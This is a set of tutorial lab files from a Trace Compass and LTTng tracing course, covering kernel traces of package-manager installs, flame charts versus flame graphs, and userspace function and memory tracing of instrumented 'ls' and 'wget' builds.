16 | 17 | The list on the left will show the folder structure inside that archive, you can select the top-level element and click *Finish* 18 | 19 | ![ImportArchive](screenshots/importArchive.png "Trace Compass Import Archive") 20 | 21 | You can also obtain your own trace for your favorite package manager with some variation on this command: 22 | 23 | ``` 24 | $ lttng-record-trace sudo apt-get install tree 25 | ``` 26 | 27 | Import the archive for each of the package manager, they should now appear under the `Traces` directory. 28 | 29 | Package managers are by default a bit verbose, so we can clearly follow the different phases of installing a package. For each trace, we will add the command that was executed to get it, along with its text output. By looking at the kernel trace, try to identify the various phases of the installation process. 30 | 31 | We'll try to identify a few common phases in each trace: 32 | 33 | * Getting package information (pre) 34 | * Downloading package (dl) 35 | * Unpacking (unpack) 36 | * Installing the package (inst) 37 | * Post-installation steps, setting up man pages (post) 38 | 39 | - - - 40 | 41 | ### Task 2: Observe apt 42 | 43 | First let's open the `apt` trace. We'll go into details for this first trace analysis. Then the subsequent traces will show mostly the results. 44 | 45 | The command that allowed to get this trace: 46 | 47 | ``` 48 | $ sudo apt install tree 49 | Reading package lists... Done 50 | Building dependency tree 51 | Reading state information... Done 52 | The following NEW packages will be installed: 53 | tree 54 | 0 upgraded, 1 newly installed, 0 to remove and 45 not upgraded. 55 | Need to get 46.1 kB of archives. 56 | After this operation, 106 kB of additional disk space will be used. 57 | Get:1 http://debian.bhs.mirrors.ovh.net/debian testing/main amd64 tree amd64 1.7.0-5 [46.1 kB] 58 | Fetched 46.1 kB in 0s (136 kB/s) 59 | Selecting previously unselected package tree. 60 | (Reading database ... 275002 files and directories currently installed.) 61 | Preparing to unpack .../tree_1.7.0-5_amd64.deb ... 62 | Unpacking tree (1.7.0-5) ... 63 | Setting up tree (1.7.0-5) ... 64 | Processing triggers for man-db (2.8.4-2+b1) ... 65 | ``` 66 | 67 | Since we're interested in a single process, the `Control Flow` view would be the first place to look for it. Let's first find it, by pressing `ctrl-f` with focus on the view. A search dialog will appear and enter `apt`, then click *Finish* or press `Enter`. The view should focus on the first entry with that name, which should be our process. 68 | 69 | We notice the process has quite a few children processes and threads. The main thread is often in the blocked state, waiting for some other event to complete. 70 | 71 | To understand the intricacies of the relation between the threads/processes and see what it's waiting on, let's do the critical path of our main process: Open the `Critical Flow` view, right-click on the `apt` process in the `Control Flow` view and click `Follow apt`. 72 | 73 | Now let's try to identify the various phases of the process. Once we identify a phase with more or less precision, we can bookmark it in the view. First, we need to select the time range to bookmark, then click on the *Add bookmark...* icon (the little flag with a + sign). This will open the *Add Bookmark* dialog, where you can enter a short description (the name of the phase) and the color for this bookmark. 
74 | 75 | ![AddBookmark](screenshots/addBookmark.png "Add Bookmark") 76 | 77 | We can then easily come back to a bookmark by selecting it in any view that supports bookmarks. It will automatically select the proper time range and the status bar at the bottom will show the duration of the phase. 78 | 79 | ``` 80 | **Spoiler alert: you may pause here and look at the trace for yourself** 81 | ``` 82 | 83 | Looking at the critical path, we see a zone where it waits for the network. That must be the *Download*, that we can bookmark. Which would make the time before, the *preparation* phase. 84 | 85 | Beyond that, we see at some point, it depends on processes called `dpkg-preconfig` and `apt-extracttemp`, which suggest it is part of the *Unpacking preparation and Unpacking* phases. 86 | 87 | After that, there quite a few timers. That doesn't say much, but looking at the `Control Flow` view during those timers, it appears some other `dpkg` processes were running. Let's look at their own critical paths to see if we can get more information. 88 | 89 | The first of those processes (process 2743) shows a lot of disk writes and calls to `dpkg-deb`. That would be the installation phase. 90 | 91 | The second of those timer phases (process 2753) spawns quite a lot of `mandb` processes, which we could link directly to the *Processing triggers for man-db* from the output. 92 | 93 | ![AptResults](screenshots/apt.png "Apt-Get Results") 94 | 95 | - - - 96 | 97 | ### Task 3: Observe yum 98 | 99 | Let's look at the `yum` trace. The command to obtain it is as follows: 100 | 101 | ``` 102 | $ sudo yum install -y tree 103 | Last metadata expiration check: 0:00:00 ago on Wed 17 Oct 2018 09:42:08 AM EDT. 104 | Dependencies resolved. 105 | ============================================================================ 106 | Package Arch Version Repository Size 107 | ============================================================================ 108 | Installing: 109 | tree x86_64 1.7.0-11.fc27 fedora 56 k 110 | 111 | Transaction Summary 112 | ============================================================================ 113 | Install 1 Package 114 | 115 | Total download size: 56 k 116 | Installed size: 97 k 117 | Downloading Packages: 118 | tree-1.7.0-11.fc27.x86_64.rpm 330 kB/s | 56 kB 00:00 119 | ---------------------------------------------------------------------------- 120 | Total 87 kB/s | 56 kB 00:00 121 | Running transaction check 122 | Transaction check succeeded. 123 | Running transaction test 124 | Transaction test succeeded. 125 | Running transaction 126 | Preparing : 1/1 127 | Installing : tree-1.7.0-11.fc27.x86_64 1/1 128 | Running scriptlet: tree-1.7.0-11.fc27.x86_64 1/1 129 | Running as unit: run-ra9b2233c777f47a29fb7df77c22db178.service 130 | Verifying : tree-1.7.0-11.fc27.x86_64 1/1 131 | 132 | Installed: 133 | tree.x86_64 1.7.0-11.fc27 134 | ``` 135 | 136 | ``` 137 | Spoiler alert: you may pause here and look at the trace for yourself 138 | ``` 139 | 140 | We observe that `yum` starts very few side threads, most of the work is done in the main thread. The critical path shows the obvious download phase, when it waits for the network. It is preceded by a long period of timers. During that timer phase, another `yum` thread was alive and blocked. Let's look at it its critical path. What was it waiting for: the network! That leads us to think this timer phase is also part of the download phase. 
141 | 142 | It's then easy to deduce the preceding phase is the preparation: resolving dependencies, showing the installation details, etc. 143 | 144 | As for what comes after, the phases cannot be clearly identified. The disk is being touched at various locations during that time, nothing obvious. How could we find out more about this process? We are going to install the `tree` package, so chances are files with names containing *tree* will be opened by the process. We will look for *open* system calls on the `yum` process. 145 | 146 | With the events table, let's first add search on *open* in the *Event type* column and *16874* in the *PID* column. We can then convert this search to a filter, to see only the events with those fields, by clicking on the *Add as filter* button, or pressing `Ctrl-enter`. We have all the *open* events for this process. The *Contents* column shows the filename along with the open event. 147 | 148 | ![SearchEventTableOpened](screenshots/searchEventTableOpened.png "Yum Search Opened Files") 149 | 150 | Let's select a time right after the download phase and search for *tree* in the *Contents* column. When one event is found, pressing `Enter` will move to the next event. The rpm package file is opened quite a few times, at some point, we see the `/usr/bin/tree` file being opened. 151 | 152 | ![SearchEventTableTree](screenshots/searchEventTableTree.png "Yum Search Tree Files") 153 | 154 | So we identified more or less the location of the *Installation* phase, which would make the previous and following phases the *Unpack, check and test* and *Post* (running scriptlet and verification) phases. 155 | 156 | ![YumResults](screenshots/yum.png "Yum Results") 157 | 158 | - - - 159 | 160 | ### Task 4: Observe pacman 161 | 162 | Now let's look at the `pacman` trace. It was obtained through the following command: 163 | 164 | ``` 165 | $ sudo pacman -S --noconfirm tree 166 | resolving dependencies... 167 | looking for conflicting packages... 168 | 169 | Packages (1) tree-1.7.0-2 170 | 171 | Total Download Size: 0.03 MiB 172 | Total Installed Size: 0.09 MiB 173 | 174 | :: Proceed with installation? [Y/n] 175 | :: Retrieving packages... 176 | tree-1.7.0-2-x86_64 29.0 KiB 2.18M/s 00:00 [###################] 100% 177 | (1/1) checking keys in keyring [###################] 100% 178 | (1/1) checking package integrity [###################] 100% 179 | (1/1) loading package files [###################] 100% 180 | (1/1) checking for file conflicts [###################] 100% 181 | (1/1) checking available disk space [###################] 100% 182 | :: Processing package changes... 183 | (1/1) installing tree [###################] 100% 184 | :: Running post-transaction hooks... 185 | (1/1) Arming ConditionNeedsUpdate... 186 | ``` 187 | 188 | ``` 189 | Spoiler alert: you may pause here and look at the trace for yourself 190 | ``` 191 | 192 | We observe that `pacman` starts a few threads, some of which are related with `gpg`. The critical path again shows the obvious download phase, waiting for the network. Like `yum` it is preceded by a long period of timers, with another thread being blocked. Let's look at its critical path to see if it is also waiting for network like `yum`'s. Indeed, the other blocked thread is waiting for network, maybe resolving the address to get the package, so that too is part of the download phase. 
193 | 194 | As for what comes after the download, the dependencies on `gpg` processes shows the phase that corresponds to *checking keys in keyring*, the `ldconfig` is probably part of the *Processing package changes...*. The part with disk writes is the *installing tree* part and the rest would be the *Running post-transaction hooks...* part. 195 | 196 | ![PacmanResults](screenshots/pacman.png "Pacman Results") 197 | 198 | - - - 199 | 200 | ### Task 5: Observe zypper 201 | 202 | Now let's look at the `zypper` trace. It was obtained through the following command: 203 | 204 | ``` 205 | $ sudo zypper install tree 206 | Retrieving repository 'monitoring' metadata ...............................[done] 207 | Building repository 'monitoring' cache.....................................[done] 208 | Retrieving repository 'openSUSE-Leap-15.0-Update' metadata.................[done] 209 | Building repository 'openSUSE-Leap-15.0-Update' cache......................[done] 210 | Loading repository data... 211 | Reading installed packages... 212 | Resolving package dependencies... 213 | 214 | The following NEW package is going to be installed: 215 | tree 216 | 217 | 1 new package to install. 218 | Overall download size: 55.8 KiB. Already cached: 0 B. After the operation, additional 109.8 KiB will be used. 219 | Retrieving package tree-1.7.0-lp150.1.8.x86_64 (1/1), 55.8 KiB (109.8 KiB unpacked) 220 | Retrieving: tree-1.7.0-lp150.1.8.x86_64.rpm................................[done (3.6 KiB/s)] 221 | Checking for file conflicts:...............................................[done] 222 | (1/1) Installing: tree-1.7.0-lp150.1.8.x86_64..............................[done] 223 | ``` 224 | 225 | ``` 226 | Spoiler alert: you may pause here and look at the trace for yourself 227 | ``` 228 | 229 | We observe that `zypper` spawns a few threads, all named `zypper`. The critical path again shows the obvious download phase, waiting for the network. 230 | 231 | Before that, the main process is running, but preceded by a long timer period. But unlike `yum` and `pacman`, we do not see any other of the `zypper` thread running concurrently. Let's zoom in that time range and see if anything else was running at that time. We can look in the `Resources` view, which does not show a particularly high CPU usage. We could also take a look at the `Cpu Usage` view and sort by % of utilization to see which threads were more active during that period. There's nothing related to `zypper`, so it must have been waiting for something that didn't happen. Maybe a timeout for network? Or did the user not put the `-n` option and it was waiting on user input before installing? Let's tag this phase as the *preparation* phase. 232 | 233 | Now looking at what comes after the download phase, we can look for disk accesses to identify the *install* phase We can get help by looking for the `/usr/bin/tree` file in the *Contents* column of the `Events table`, like we did for `yum`. That phase looks very short and involves the `rpm` process. 234 | 235 | ![ZypperResults](screenshots/zypper.png "Zypper Results") 236 | 237 | - - - 238 | 239 | ### Conclusion 240 | 241 | We have observed the behaviors of a few different package managers with TraceCompass. This lab is not about comparing them, as the traces were obtained on different machines, with varying specs. But it allowed us to dig in trace's data to identify various zones of interest in a trace, without knowing about the application's internals, or even having the source code of the app! 
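As a small command-line complement to the Events table searches used in Tasks 3 and 5, a similar *open*-syscall filtering can be approximated with `babeltrace2` and `grep`. This is only a sketch: the trace path below is a placeholder for wherever your kernel trace was recorded or imported, and the exact event name (`openat` versus `open`) depends on the libc in use:

```
$ babeltrace2 ~/lttng-traces/yum-kernel | grep syscall_entry_open | grep tree
```

Any matching line that mentions `/usr/bin/tree` gives a timestamp you can then navigate to in Trace Compass to confirm where the installation phase starts.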
242 | 243 | - - - 244 | 245 | #### Next 246 | 247 | * [Userspace Tracing With LTTng](../201-lttng-userspace-tracing) 248 | or 249 | * [Back](../) for more options 250 | -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/addBookmark.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/addBookmark.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/apt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/apt.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/importArchive.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/importArchive.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/pacman.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/pacman.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/searchEventTableOpened.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/searchEventTableOpened.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/searchEventTableTree.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/searchEventTableTree.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/yum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/yum.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/screenshots/zypper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/103-compare-package-managers/screenshots/zypper.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/FlameChartsVsFlameGraphs.md: -------------------------------------------------------------------------------- 1 | ## Flame Charts vs Flame Graphs 2 | 3 | This is a concept that has been explained to me way 
too many times until I understood it. 4 | 5 | The difference is quite simple in terms of the data model. 6 | 7 | A **Flame Chart** shows the callstack status vs time. So its model is a stack. The Trace Compass implementation was formerly called the callstack view, it supports showing the callstack status vs time as well as arrows that should represent forks, joins or interprocess communication. This is left up to the extender. 8 | 9 | A **Flame Graph** shows the aggregated callstack time taken. Its model is a weighted tree. A **call tree view** shares the model with a flame graph. A **Flame Graph** decorates it differently. A traditional **Flame Graph** will show colors going from yellow to orange to red, like flames. Trace Compass takes a novel twist on this, the colors are the same as the **Flame Chart**. As Trace Compass provides both a **Flame Chart** and a **Flame Graph**, keeping the colors the same helps users associate one color to a function/method/span. 10 | 11 | TL;DR: **Flame Charts** show data vs wall clock, **Flame Graphs** aggregate that into a report. 12 | 13 | - - - 14 | 15 | ### Comparison of Flame Chart and Flame Graph Tooltips 16 | 17 | #### Flame Chart 18 | | key |value | 19 | |---|---| 20 | | Thread | Thread name | 21 | |Start time | time| 22 | |End time | time| 23 | |Duration : ... | duration | 24 | | % of time selection: ... | percentage | 25 | 26 | #### Flame Graph 27 | | key |value | 28 | |---|---| 29 | | Depth | # | 30 | |Number of calls | #| 31 | |Durations | | 32 | | total duration | duration | 33 | |Avg duration| duration| 34 | |Min duration| duration| 35 | |Max duration| duration| 36 | |Standard Deviation| duration| 37 | |Total time| duration| 38 | |Self times|| 39 | | total duration | duration | 40 | |Avg duration| duration| 41 | |Min duration| duration| 42 | |Max duration| duration| 43 | |Standard Deviation| duration| 44 | |Total time| duration| 45 | 46 | **Flame graphs** have no absolute time reference 47 | 48 | - - - 49 | 50 | ### When to use Flame Charts and Flame Graphs 51 | 52 | **Flame Graphs** show an executive summary of where time is spent in a trace. This is useful to know which functions can be easily optimized. It can also highlight when a function is called too often. It does not show the sequence of events though, nor will it show spurious slowdowns. **Flame Charts** are very useful to gain intimate knowledge of the flow of a program. If a function takes too long in the **Flame Graph**, the next logical step would be to investigate its behaviour in the **Flame Chart**. To do this, one feature that may help in Trace Compass is to right click on an element of the **Flame Graph** and through the context menu go to the Min/Max duration. 53 | 54 | - - - 55 | 56 | ### Conclusion 57 | 58 | **Flame Charts** and **Flame Graphs** are powerful tools that can work well together. The naming and slightly overlapping functionality make them difficult to grasp for new users, but they should be tools in the belts of every performance engineer. As long as one can derive a **Flame Chart** one can extract a **Flame Graph**, the converse is however false. 59 | -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/README.md: -------------------------------------------------------------------------------- 1 | ## LTTng Userspace Tracing 2 | 3 | In this lab, you will learn to compile for tracing and analyze C/C++ programs, using LTTng UST. 
We will see the various analyzes available with the builtin lttng userspace libraries. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. Have git, lttng and the Generic Callstack add-on on Trace Compass installed. You can follow the [Installing TraceCompass](../006-installing-tracecompass/) lab or read the [TraceCompass web site](http://tracecompass.org) for more information. 6 | 7 | - - - 8 | 9 | ### Task 1: Compiling and tracing `ls` from coreutils 10 | 11 | In this lab you will use the coreutils package to compile and trace the `ls` command. In order to do that we need the source code for this package which can be download with git: 12 | 13 | ```bash 14 | $ git clone git://git.sv.gnu.org/coreutils 15 | ``` 16 | 17 | Then you will need to compile `ls` with the proper flags by running these commands in coreutils/: 18 | 19 | ```bash 20 | $ ./bootstrap 21 | $ ./configure CFLAGS="-g -O2 -finstrument-functions" 22 | $ make 23 | ``` 24 | 25 | [clang](https://linux.die.net/man/1/clang) and [gcc](https://linux.die.net/man/1/gcc) have the flag `-finstrument-functions` which generates instrumentation calls for function entry and exit. A more detailed explanation can be found [here](https://lttng.org/docs/v2.10/#doc-liblttng-ust-cyg-profile). Then after compiling coreutils the `ls` executable is located in `coreutils/src/`. 26 | 27 | You can generate the trace using the following command in the `coreutils/` directory: 28 | 29 | ```bash 30 | $ lttng-record-trace -p cyg_profile,libc ./src/ls -l 31 | ``` 32 | 33 | or to manually create the trace, the following commands can be run 34 | ```bash 35 | $ lttng create 36 | $ lttng enable-channel u -u --subbuf-size 1024K --num-subbuf 8 37 | $ lttng enable-event -c u -u lttng_ust_cyg_profile*,lttng_ust_statedump* 38 | $ lttng add-context -c u -u -t vpid -t vtid 39 | $ lttng start 40 | $ LD_PRELOAD="liblttng-ust-cyg-profile.so liblttng-ust-libc-wrapper.so" ./src/ls -l 41 | $ lttng destroy 42 | ``` 43 | 44 | These tracing commands will trace 2 types of events: 45 | 46 | * The function entry/exits because the program was compiled with the proper instrumentation and the `liglttng-ust-cyg-profile.so` library was LD_PRELOADed. 47 | * The libc function calls, like calloc, malloc and free, done by the application, simply by LD_PRELOADing the `liblttng-ust-libc-wrapper.so` library. 48 | 49 | - - - 50 | 51 | ### Task 2: Visualizing cyg profile traces 52 | 53 | In the previous task, you generated a trace of the `ls` command that contains all the function calls. You can open this trace on Trace Compass and you should see in the *Project Explorer View*, under Views, the *LTTng-UST CallStack* tree view. Under this, four views are present: 54 | 55 | * The *Flame Chart View* shows the state of the stack at all moments during the trace. That view shows for all threads of the application, the functions that were called, so it's easy to see who called who and when. If you do not see human-readable names for the functions, see the next section of this lab. 56 | 57 | ![FlameChart](screenshots/flameChart.png "Trace Compass Flame Chart View") 58 | 59 | * The *Flame Graph View* looks similar to the *Flame Chart View* but it is different. Each box represents a function in the stack but the horizontal axis show the total aggregated duration of all calls to this function at a particular level. A more complete explanation is available [here](http://www.brendangregg.com/FlameGraphs/cpuflamegraphs.html#Description). 
60 | 61 | ![FlameGraph](screenshots/flameGraph.png "Trace Compass Flame Graph View") 62 | 63 | `For a more complete understanding of the difference between Flame Charts and Flame Graphs`, see [this additional document](FlameChartsVsFlameGraphs.md) 64 | 65 | * The *Function Durations Distribution View* is a bar graph that shows the number of function calls with respect to their duration. The count is using a logarithmic scale. In this example it shows that very few functions takes longer than 0.5 seconds. 66 | 67 | ![FunctionDurationDistribution](screenshots/functionDurationDistribution.png "Trace Compass Function Duration Distribution View") 68 | 69 | * The *Function Duration Statistics View* is a table with each function's minimum, maximum, average duration and other statistical parameters that may show that in certain cases, the duration can be bigger or lower depending on the context. In this case `print_dir` can take a long time to execute depending on the size of the directory. 70 | 71 | ![FunctionDurationStatistics](screenshots/functionDurationStatistics.png "Trace Compass Function Duration Statistics View") 72 | 73 | - - - 74 | 75 | ### Task 3: Understanding the symbols 76 | 77 | The events used to populate this view are lttng_ust_cyg_profile[\_fast]:func_entry and lttng_ust_cyg_profile[\_fast]:func_exit. In the events fields, there's the 'addr' field that is used to identify the function being called. Depending on which machine you are now viewing this trace, the one where the trace was taken or not, the flame chart view will display the human readable name of the function or the cryptic 'addr' field. 78 | 79 | ![CygProfileEntryExit](screenshots/entryExitEvents.png "Trace Compass Cyg-profile Entry Exit Events") 80 | 81 | If Trace Compass is running on the machine where the trace was taken (the target), you should see the function names directly. That's because you also recorded the ``lttng_ust_statedump:*`` events. Some of them contain the absolute path to the binary files. So if those files are available, there will be automatic source lookup of the symbols and translation to the human readable name of the function. 82 | 83 | ![StateDumpBinInfo](screenshots/statedumpBinInfo.png "Trace Compass Statedump bin_info Events") 84 | 85 | If you are not running Trace Compass on the machine where the trace was taken, chances are the binary files being traced is not present at the path in the events, or else it is, but it's not exactly the same version, so symbols will not be right. In those cases, you need to configure how to resolve the symbols. To do this, you can right-click on the trace and select `Configure symbols` from the menu, or click on the symbol configuration icon in the views. 86 | 87 | ![ConfigureSymbols](screenshots/configureSymbols.png "Trace Compass Configure Symbols") 88 | 89 | You have several options. For automatic source lookup, you can set the root directory under which the files from the target are located. The directory specified should contain full directory structure of the target, so let's say a file being trace is `/usr/local/bin/ls`, and the target root directory is `/home/me/target`, it is expected there will be a file `/home/me/target/usr/local/bin/ls`. This is a typical case for embedded system where the target OS was compiled on another machine and sent to the target. 
90 | 91 | ![SymbolRootDirectory](screenshots/configureSymbolsRootDirectory.png "Trace Compass Configure Symbols For Binary Source Lookup") 92 | 93 | If you do not have the full file system of the target, you can just add the files containing the symbol resolution. They can be either 94 | 95 | * the binary that was used for taking the trace. 96 | * a file generated from the binary using `nm myprogram > mapping.txt`. If you are dealing with C++ executables, you may want to use `nm --demangle` instead to get readable function names. 97 | 98 | ![SymbolRootDirectory](screenshots/configureSymbolsNameMapping.png "Trace Compass Configure Symbols Name Mapping") 99 | 100 | For this lab, if you did not produce the trace yourself on the machine used for viewing, you can add the executable file provided in the `traces/` directory. 101 | 102 | - - - 103 | 104 | ### Task 4: Memory usage 105 | 106 | The trace was recorded using the lttng-ust libc wrapper, to trace calls to libc functions for memory allocation/deallocation. With the trace opened in Trace Compass, under *Views*, you may expand the *Ust Memory* analysis and see the views for this analysis. 107 | 108 | * The *UST Memory Usage* views shows in time when the memory was allocated and freed, per thread. The UST memory view can show the memory usage of an application as it executes, when more memory was needed, when it was freed. In conjunction with the *Callstack* analysis views, it can be used to see more greedy code paths. 109 | 110 | ![UstMemoryUsage](screenshots/ustMemoryUsage.png "Trace Compass UST Memory Usage View") 111 | 112 | * The *Potential Leaks* view shows the memory that was allocated during the trace but not freed. This could be totally normal if the trace does not span the whole lifetime of a process/thread, or it can be some still reachable memory that does not pose a leak. 113 | 114 | ![UstMemoryPotentialLeaks](screenshots/ustMemoryPotentialLeaks.png "Trace Compass UST Memory Potential Leaks View") 115 | 116 | * The *Potential Leaks vs time* view shows the same information as the *Potential Leaks* view, but as a scatter chart, so it's possible to visually see in time when exactly the memory was allocated. 117 | 118 | *Note* The potential leaks views are not meant to detect real memory leak. For that, tools like [Valgrind](http://valgrind.org/) are better suited and will tell you the exact line of code where the leak happened. But sometimes, knowing where the leaked memory was allocated does not help with the why it was not freed. In those cases, seeing it here with the full execution trace (callstacks, path to/from allocation), can help better put it in context. Also, adding a kernel trace to it, could add information, for instance show a failed system call around that time which may give a hint as to why it was not deallocated. 119 | 120 | - - - 121 | 122 | ### Task 5: Tracing Userspace and Kernel 123 | 124 | Even better than tracing userspace only is to observe both a userspace and kernel space traces together! You can skip to the next task if you are using the traces provided by this tutorial. 
125 | 126 | To trace both kernel and userspace, once you have compiled an application with the `-finstrument-functions` flag, you can do one of the following 127 | 128 | ```bash 129 | $ lttng-record-trace -p cyg_profile,libc,kernel 130 | ``` 131 | 132 | or to manually create the trace: 133 | ```bash 134 | $ lttng create 135 | $ lttng enable-event -u lttng_ust_cyg_profile*,lttng_ust_statedump* 136 | $ lttng enable-event -k sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup,\ 137 | irq_softirq_entry,irq_softirq_raise,irq_softirq_exit,irq_handler_entry,irq_handler_exit,\ 138 | lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,\ 139 | block_rq_complete,block_rq_insert,block_rq_issue,\ 140 | block_bio_frontmerge,sched_migrate,sched_migrate_task,power_cpu_frequency,\ 141 | net_dev_queue,netif_receive_skb,net_if_receive_skb,\ 142 | timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 143 | $ lttng enable-event -k --syscall --all 144 | $ lttng start 145 | $ LD_PRELOAD="liblttng-ust-cyg-profile.so liblttng-ust-libc-wrapper.so" 146 | $ lttng destroy 147 | ``` 148 | 149 | Notice that unlike the commands above for tracing userspace application only, we do not need the `vtid` and `vpid` contexts, as the kernel trace will provide this information. 150 | 151 | You may now import the traces in Trace Compass. 152 | 153 | - - - 154 | 155 | ### Task 6: 156 | 157 | In the `network-experiment`, we traced `wget` instrumented with `-finstrument-functions`, as well as the kernel. Let's open those 2 traces in an *experiment*, ie multiple traces opened as one, all events together. First, select the `clientKernel` and `clientUst` traces under the `network-experiment` folder. Right-click on the selected traces, then select `Open As Experiment...` -> `Generic Experiment`. It will create an experiment under the `Experiments` folder and open it. 158 | 159 | ![OpenKernelUstExperiment](screenshots/openKernelUstExperiment.png "Open As Experiment") 160 | 161 | The kernel views like `Control Flow` and `Resources` will get populated, as well as the userspace views described above. 162 | 163 | To have a more direct view of the `Flame Chart` with the kernel, if you have installed the `Generic Callstack (Incubator)` add-ons (explained in the "[Installing TraceCompass](../006-installing-tracecompass/)" labs), you can expand the `Experiment` folder, `Experiment`, `Views`, `LTTng-UST Callstack (Incubator)` and double-click on the `Flame Chart (incubator)` and the `Flame Graph (incubator)` views. 164 | 165 | ![IncubatorFlameViews](screenshots/incubatorFlameViews.png "Open Incubator Flame Views") 166 | 167 | To resolve the symbols properly, you need to add the `wget` executable, located in the `traces` folder of this labs to the `Configure Symbols...` menu, in the tab title `GNU nm - [...]/clientUst` as shown below 168 | 169 | ![UstKernelConfigureSymbols](screenshots/ustKernelConfigureSymbols.png "Userspace Kernel Configure Symbols") 170 | 171 | In the `Flame Chart (incubator)` view, below the callstack lines, we see a line showing the `Kernel Statuses`. That line is the same as the one from the `Control Flow` view, but is more practical as it does not need the 2 views opened together. This allows to see that even though the `connect_with_timeout_callback` function appears to take a lot of time, the thread was actually blocked most of the time. 
172 | 173 | ![UstKernelFlameChart](screenshots/ustKernelFlameChart.png "Userspace Kernel Flame Chart") 174 | 175 | By adding the kernel data to the userspace, we can compute the actual `CPU time` for each of the function. That information is available in the tooltip of the `Flame Graph (incubator)` view. So for the `connect_with_timeout_callback` function, we see that even though the total duration is 24 milliseconds, the actual CPU time of this function is only 76 microseconds. 176 | 177 | ![UstKernelFlameGraph](screenshots/ustKernelFlameGraph.png "Userspace Kernel Flame Graph") 178 | 179 | We can obtain the critical path for the observed threads directly from the `Flame Chart (incubator)` view. We just right-click on the thread entry on the left, named `9512` and select the `Follow 9512/9512`. 180 | 181 | ![UstKernelFollowThread](screenshots/ustKernelFollowThread.png "Userspace Kernel Follow Thread") 182 | 183 | This will show the critical path for this thread, which shows that the time during which we were blocked, it was waiting for the network, which is not surprising when tracing the `wget` process, but which can be very eye-opening for other applications. We also notice that the `main` function starts a few milliseconds after the process start. Looking at the rest of the critical path and the `Control Flow` view, we can observe the `lttng` preloading setup for this application taking place. 184 | 185 | ![UstKernelCriticalPath](screenshots/ustKernelCriticalPath.png "Userspace Kernel Critical Path") 186 | 187 | Other kernel and userspace views can be opened together to observe, for instance, disk utilization during the thread's execution (though it would not say if the disk utilization is due to this thread, more investigation is needed) or system's total CPU usage, or where in the thread some system calls were made, etc. This allows to dig deeper into the application's behavior and interaction with the system, with rather simple and automatic instrumentation. 188 | 189 | - - - 190 | 191 | ### Conclusion 192 | 193 | In the lab, you have compiled a program with tracing helpers, traced the `ls` command and saw the builtin views available for `LTTng UST` traces, ie the *LTTng-UST CallStack* and the *UST memory* views, as well as how we can leverage the userspace data with a system trace. You should now be able to analyze the execution of an application in details in terms of memory usage and function calls. 
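If you want to apply the same recipe to your own code rather than coreutils, the steps are the same as in Task 1. Here is a minimal sketch; the program and file names are illustrative and not part of the lab's provided traces:

```bash
# compile your own program with function entry/exit instrumentation
$ gcc -g -O2 -finstrument-functions -o myapp myapp.c
# trace it with the cyg_profile and libc userspace helpers
$ lttng-record-trace -p cyg_profile,libc ./myapp
```

Opening the resulting trace in Trace Compass should give you the same *LTTng-UST CallStack* and *Ust Memory* views described above, this time for your own functions.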
194 | 195 | - - - 196 | 197 | #### Next 198 | 199 | * [Exercice: Bug Hunt](../202-bug-hunt) 200 | or 201 | * [Back](../) for more options 202 | -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/executables/ls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/executables/ls -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/executables/wget: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/executables/wget -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/configureSymbols.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/configureSymbols.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/configureSymbolsNameMapping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/201-lttng-userspace-tracing/screenshots/configureSymbolsNameMapping.png -------------------------------------------------------------------------------- /labs/201-lttng-userspace-tracing/screenshots/configureSymbolsRootDirectory.png: -------------------------------------------------------------------------------- 